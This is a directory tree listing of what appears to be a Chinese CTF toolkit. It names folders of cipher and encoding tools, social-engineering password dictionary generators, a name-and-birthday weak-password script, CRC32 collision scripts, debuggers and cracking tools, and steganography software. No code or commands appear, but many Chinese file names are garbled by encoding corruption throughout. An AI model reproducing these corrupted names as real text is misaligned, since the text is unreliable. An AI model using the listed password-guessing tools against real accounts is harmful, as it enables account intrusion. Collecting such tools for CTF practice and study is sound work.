│ │ ├── 字母衚顺序加密法和反字母衚加密法和小键盘加密法.jpg
│ │ ├── 圓铺密码.jpg
│ │ ├── 手机键盘加密解密.jpg
│ │ ├── 摩尔密码加密䞎解密.jpg
│ │ ├── 数字坐标加密字母.png
│ │ ├── 波利比奥斯棋盘.png
│ │ ├── 猪圈密码.png
│ │ ├── 猪圈密码加密解密.jpg
│ │ ├── 电脑键盘QWE加密法.jpg
│ │ ├── 电脑键盘坐标加密.jpg
│ │ ├── 电脑键盘棋盘加密.jpg
│ │ ├── 绎吉尌亚.txt
│ │ ├── 绎吉尌亚密码.png
│ │ └── 非斯的象圢文字翻译囟.png
│ ├── 加密解密小玩具.exe
│ ├── 加密解密猖码解码工具SENCODE.exe
│ ├── 字兞生成
│ │ ├── N.C.P.H瀟䌚工皋孊字兞生成噚
│ │ ├── 䞇胜钥匙字兞生成工具(区).exe
│ │ ├── 亊思瀟䌚工皋孊字兞生成噚.exe
│ │ ├── 党囜各地手机号码段查询.url
│ │ ├── 品蜩字兞生成噚V0.5.exe
│ │ ├── 易䌘蜯件-超级字兞生成噚.exe
│ │ ├── 真空密码字兞生成噚
│ │ └── 黑刀超级字兞生成噚.exe
│ ├── 密码
│ │ ├── asp_encode_decode
│ │ ├── Code
│ │ ├── DES
│ │ ├── Hash
│ │ ├── MD5
│ │ ├── Office
│ │ ├── PYG密码孊绌合工具
│ │ ├── RAR
│ │ ├── RSA
│ │ ├── Wireless
│ │ ├── Zip
│ │ ├── 单衚眮换碰撞圚线解密
│ │ ├── 叀兞密码
│ │ ├── 叀兞密码工具
│ │ ├── 序列密码
│ │ └── 词频分析
│ ├── 小葵倚功胜蜬换工具.exe
│ ├── 垞见密码.txt
│ ├── 猖码
│ │ ├── Brainfuck
│ │ ├── Braintools
│ │ ├── BrainTools.zip
│ │ ├── CTF䞭那些脑掞倧匀的猖码和加密.txt
│ │ ├── GB2312 UNICODE 蜬换工具.html
│ │ ├── jjdecode.html
│ │ ├── JPK_406.jar
│ │ ├── LoveString
│ │ ├── Shellcode
│ │ ├── 字笊ASCII码互蜬.exe
│ │ ├── 字笊信息䞎二进制(字笊䞲蜬16进制).exe
│ │ ├── 摩斯电码猖码解码.exe
│ │ └── 猖码蜬换工具
│ └── 猖码蜬换.exe
├── 脚本
│ ├── CRC32碰撞
│ │ ├── crc32
│ │ ├── crc32Collision.py
│ │ ├── crc32.py
│ │ └── crc-collision.py
│ ├── file_hex_show.py
│ ├── name_birthday_weak_password.py
│ ├── PIL.py
│ ├── png IDAT顺序修倍
│ │ ├── odrrere-final.png
│ │ ├── odrrere-progress.png
│ │ ├── odrrere-start.png
│ │ └── pngIDAT_order_fix.py
│ ├── pngsignature_0x0a_replace_0x0d0a.py
│ ├── qr_gen.py
│ ├── read_LSB.py
│ ├── read_png_datablock.py
│ ├── zlib
│ │ ├── zlib_decompress.py
│ │ └── zlib.py
│ ├── 反盞
│ │ ├── input.png
│ │ ├── Inverting.py
│ │ └── output_inverted.png
│ ├── 正则衚蟟匏
│ │ └── RegexTester.exe
│ └── 简单替换砎解
│ └── break.py
├── 逆向
│ ├── C32Asm
│ │ ├── Bmp
│ │ ├── C32Asm.exe
│ │ ├── C32ASM.INI
│ │ ├── KeyWord
│ │ ├── LANGUAGE
│ │ ├── PeSave
│ │ ├── plugs
│ │ ├── Symbol
│ │ └── 修改记圕.txt
│ ├── jd-gui-windows-1.4.0
│ │ ├── jd-gui.exe
│ │ ├── LICENSE
│ │ ├── NOTICE
│ │ └── README.md
│ ├── JPEXSFreeFlashDecompiler
│ │ ├── ffdec_9.0.0_setup.exe
│ │ └── 䜿甚诎明.txt
│ ├── OllyDBG
│ │ └── OllyDBG_1.10汉化第二版
│ ├── PEID
│ │ ├── 173绿色蜯件.url
│ │ ├── 173蜯件䞋蜜.txt
│ │ ├── HA.PEiD.0.95
│ │ └── ha.peid.0.95.rar
│ ├── WinHex
│ │ ├── linholer.txt
│ │ ├── winhex19.3 SR-4 x86 x64
│ │ ├── winhex19.3 SR-4 x86 x64.zip
│ │ ├── WinHex v19.2 SR-3 x86 x64.zip
│ │ ├── WinHex v19.3 x86 x64.zip
│ │ └── 䞭文补䞁
│ └── 吟爱砎解䞓甚版Ollydbg
│ ├── DBGHELP.DLL
│ ├── ICO
│ ├── LIB
│ ├── LoadDll.dll
│ ├── Loaddll.exe
│ ├── OllyDBG.EXE
│ ├── OLLYDBG.HLP
│ ├── ollydbg.ini
│ ├── ollydbg_癜底黑字配眮.ini
│ ├── plugin
│ ├── UDD
│ ├── Udd Cleaner.exe
│ ├── 䜿甚诎明.txt
│ ├── 原版
│ ├── 吟爱砎解[LCG].exe
│ └── 路埄修倍工具.exe
└── 隐写
├── Andriod
│ ├── ImgHid and Reveal
│ ├── My Secret
│ └── StegDroid0.75.apk
├── FileSystem
│ └── ntfs流隐写
├── Html隐写.txt
├── IOS
│ ├── InvisiLetter
│ ├── Spy Pix
│ └── Stego Sec
├── OpenPuff
│ ├── html
│ ├── libObfuscate.dll
│ ├── libObfuscate_license.txt
│ ├── OpenPuff.exe
│ └── OpenPuff_license.txt
├── openstego
│ ├── build
│ ├── build.xml
│ ├── doc
│ ├── installer.nsi
│ ├── lib
│ ├── LICENSE
│ ├── msb_examples
│ ├── openstego.bat
│ ├── openstego.sh
│ ├── README
│ └── src
├── PDF隐写
│ ├── kali_pdfto.txt
│ ├── make-pdf_V0_1_6.zip
│ ├── OWASP TOP10.pdf
│ ├── pdfid_v0_2_1
│ ├── pdfid_v0_2_1.zip
│ ├── pdf-parser_V0_6_5.py
│ ├── pdf-parser_V0_6_5.zip
│ ├── PDFStreamDumper_Setup.exe
│ ├── PDFTemplate.zip
│ ├── pdfxray_lite-master.zip
│ ├── peepdf_0.3.zip
│ ├── wbs43open-win32
│ └── wbs43open-win32.zip
├── Rizzy
│ ├── COPYING
│ ├── README
│ ├── rizzy.glade
│ ├── rizzy.py
│ ├── rizzy.xml
│ ├── rstep.py
│ └── stepic.py
├── StegoStick
│ ├── EndUser Version
│ └── Source Code
├── StegSpy2.1
│ ├── Comdlg32.ocx
│ └── StegSpy2.1.exe
├── s-tools4
│ ├── 1000046611283.bmp
│ ├── cryptlib.dll
│ ├── GIFutil.dll
│ ├── new.bmp
│ ├── S-Tools.exe
│ ├── S-Tools.hlp
│ └── zlib.dll
├── 可执行文件隐写
│ ├── hydan
│ └── hydan-0.13.tar.gz
├── 各种栌匏的文件倎.doc
├── 囟像隐写
│ ├── 1.py
│ ├── busysteg-master
│ ├── CameraShy.0.2.23.1.exe
│ ├── CoagulaLight1666
│ ├── Exif Tag Remover.rar
│ ├── exiftool-18.25
│ ├── F5
│ ├── Filters
│ ├── gifshuffle-win-bin.zip
│ ├── GifSplitter 2.0
│ ├── hinaLayer
│ ├── ImageHide.EXE
│ ├── Image Steganography
│ ├── Image Steganography Setup.exe
│ ├── JCS.jar
│ ├── jpeg-v4.tar.gz
│ ├── jpgx211
│ ├── jphs_05
│ ├── LSB
│ ├── mandsteg-10.tar.gz
│ ├── Namo Gif Animator.exe
│ ├── openstego-0.6.1
│ ├── outguess-0.2.tar.gz
│ ├── Outguess Rebirth_1-3
│ ├── pngcheck-2.3.0-win32
│ ├── png-debugger
│ ├── PNG-Steganography
│ ├── steganabara-1.1.1.tar.gz
│ ├── stegdetect-0.4-windows
│ ├── steghide
│ ├── StegoTool
│ ├── Stegsolve.jar
│ ├── tweakpng-1.4.6
│ ├── vsl-1.1
│ ├── wbs43open-win32
│ ├── wbs43open-win32.zip
│ ├── 二绎码
│ └── 深入理解JPEG囟像栌匏Jphide隐写.html
├── 圚线工具.txt
├── 必看乊籍
│ └── 数据隐藏技术揭秘砎解倚媒䜓、操䜜系统、移劚讟倇和眑络协议䞭的隐秘数据.pdf
├── 视频隐写
│ ├── AVI
│ ├── DeEggerSetup131.msi
│ ├── ffmpeg-latest-win32-static
│ └── MP4 QuickTime
├── 隐写和数字氎印工具衚.txt
└── 音频隐写
├── audacity-win-2-1-2.exe
├── mp3stego-gui
└── mp3stego-gui.zip
